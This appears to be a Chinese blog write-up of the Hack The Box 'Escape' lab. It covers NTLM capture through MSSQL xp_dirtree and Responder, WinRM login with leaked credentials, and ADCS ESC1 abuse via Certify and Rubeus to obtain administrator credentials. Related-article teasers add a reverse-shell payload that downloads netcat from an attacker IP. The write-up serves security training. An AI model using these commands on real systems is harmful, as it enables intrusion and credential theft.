HTB-M-Escape

Created2025-05-23|Updated2025-05-23|penetration

|Word Count:340|Reading Time:1mins|Post Views:

HTB-M-Escape

讲的是ADCS-ESC1+MSSQL数据库引起的ntlm窃取+smb信息泄露

信息收集

dns没搜集到有用信息

1	dig any sequel.htb

smb试试存在RID,收集用户信息作为保存

smb空密码连接有文件

pdf里有个数据库的账户密码，还有几个内部人员姓名

进入数据库查询一下

1	SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'spt_fallback_db';

1	SELECT TOP 10 * FROM spt_fallback_db;

没查询到有用信息，也没权限命令执行，于是采用中间人攻击

在开启python3 Responder.py -I tun0

然后用数据库

读取我主机的共享文件

1	EXEC xp_dirtree '\\10.10.16.14\share', 1, 1

获取新账户

1 2	sql_svc REGGIE1234ronnie

查看一下服务文件之类的

这有个疑似密码当成用户名输入的

1	evil-winrm -i 10.10.11.202 -u ryan.cooper -p NuclearMosquito3

bloodhound没有获取到有用信息，看看

ADCS

存在

1
2
3

                                      SEQUEL.HTB\Administrator
[!] Vulnerabilities
  ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

.\Certify.exe find /vulnerable /currentuser

.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
cert.pem改成pfx

.\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\Documents\cert.pfx
利用凭证(只获取 TGT)

.\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /show /nowrap
直接出ntlm

参考

Author: DDL

Link: http://example.com/2025/05/23/HTB-M-Escape/

Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.

Related Articles

HTB-Jab扫描端口服务利用 XMPP - 5269, 5270（tcp下载客户端 XMPP 是一个“通用消息标准”。它允许“XMPP 兼容的软件加入 XMPP 消息网络” 先创建，新建一个用户，使用，在利用插件Service Discovery 来进行那个信息收集可以看到还有三个子域名然后点击list的用户的查找用户这，顺便开启插件控制台 123456789<iq type='set' from='ddl1@jab.htb' to='search.jab.htb' id='search4users' xml:lang='en'> <query xmlns='jabber:iq:search'> ...

HTB-M-Manager RID攻击 ADCS提权扫扫先扫一波，有web服务就去看看测试一下功能点貌似没xss 扫扫ldap端口,没有连接不让扫扫扫smb 这种需要身份验证，但是假用户也能得到部分验证可以尝试 RID 循环攻击1impacket-lookupsid dll@manager.htb -no-pass 输出中 : 前的数字是 RID 直接提取用户 1| grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tr '[:upper:]' '[:lower:]' | tee users 可以以使用netexec1netexec smb 10.10.11.236 -u guest -p '' --rid-brute 之后测试一下那个有没有用户名账号密码一样的 1netexec smb manager.htb -u users -p users --continue-on-success...

HTB-M-Outdated讲的是一个CVE的钓鱼，还有一个WSUS的提权+AddKeyCredentialLink的横移扫端口， smb匿名登录存在文件泄露pdf文件中存在在邮箱账户，以及几个CVE需要修补的然后利用存在RID但是我没有进行后续的信息收集，钓鱼攻击CVE-2022-30190编写脚本12345678910111213141516171819202122#!/usr/bin/env python3import base64import randomimport stringimport sysif len(sys.argv) > 1: command = sys.argv[1]else: command = "IWR http://10.10.16.14/nc64.exe -outfile C:\\programdata\\nc64.exe; C:\\programdata\\nc64.exe 10.10.16.14 443 -e cmd"base64_payload =...

HTB-M-Pov讲的是根据 web.config 中的文件泄露，构造发送这恶意 viewstate，来执行命令一个账号密码文件泄露 SeDebugPirvilege的提权（就是有进程迁移进入系统权限子域名爆破1ffuf -u http://10.10.11.251 -H 'HOST: FUZZ.pov.htb' -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -mc all -ac 爆破文件 1./gobuster -t 15 --delay 100ms dir -e -u "http://dev.pov.htb/portfolio" -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x...

HTB-M-SolarLab 账户名的模糊猜测 PeportLab的CVE复现 Openfire脚本中提取账号密码扫一扫试探smb 可以用来打RID 1netexec smb 10.10.11.16 -u guest -p '' --rid-brute 然后就是下载xlsx文件 1netexec smb solarlab.htb -u u.txt -p...

HTB-H-Blazorized

HTB-Blazorized提出疑问 js抓取然后获得dll这边的手法我这残缺，我正常bp抓包的没有抓取到这个dll的调用 jwt这个参数说是用Blazor Traffic Processor工具来分析这个raw，这个raw我翻遍了我的bp我也没有找到正常步骤显示爆破了一下子域名，出admin,然后↓这个出现api子域名的调用，写入hosts 广告然后再点击一下check，浏览了一下发现有不错的广告资料，copy一份 Title: Active Directory Below are links to projects and posts relating AD...

Comments